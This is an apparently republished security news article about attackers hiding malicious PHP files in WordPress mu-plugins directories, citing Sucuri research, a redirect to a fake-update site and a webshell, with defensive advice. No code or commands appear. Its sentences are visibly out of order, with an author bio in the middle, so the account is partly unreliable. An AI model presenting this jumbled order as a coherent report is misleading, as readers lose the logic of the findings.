Hackers are utilizing the WordPress mu-plugins ("Must-Use Plugins") directory to stealthily run malicious code on every page while evading detection. However, because MU-plugins run on every page load and don't appear in the standard plugin list, they can be used to stealthily perform a wide range of malicious activity, such as stealing credentials, injecting malicious code, or altering HTML output. The technique was first observed by security researchers at Sucuri in February 2025, but adoption rates are on the rise, with threat actors now utilizing the folder to run three distinct types of malicious code. It is recommended that WordPress site admins apply security updates on their plugins and themes, disable or uninstall those that aren't needed, and protect privileged accounts with strong credentials and multi-factor authentication. "The fact that we've seen so many infections inside mu-plugins suggests that attackers are actively targeting this directory as a persistent foothold," explains Sucuri's security analyst Puja Srivastava. Sucuri has not determined the exact infection pathway but hypothesizes that attackers exploit known vulnerabilities on plugins and themes or weak admin account credentials. Must-Use Plugins (mu-plugins) are a special type of WordPress plugin that automatically execute on every page load without needing to be activated in the admin dashboard. They are PHP files stored in the 'wp-content/mu-plugins/' directory that automatically execute when the page is loaded, and they are not listed in the regular "Plugins" admin page unless the "Must-Use" filter is checked. redirect.php: Redirects visitors (excluding bots and logged-in admins) to a malicious website (updatesnow[.]net) that displays a fake browser update prompt to trick them into downloading malware. Mu-plugins have legitimate use cases such as enforcing site-wide functionality for custom security rules, performance tweaks, and dynamically modifying variables or other code. Sucuri has discovered three payloads that attackers are planting in the mu-plugins directory, which appears to be part of financially motivated operations. Bill Toulas Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks. The webshell case is particularly dangerous as it allows the attackers to remotely execute commands on the server, steal data, and launch downstream attacks on members/visitors.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Mon, 31 Mar 2025 17:10:16 +0000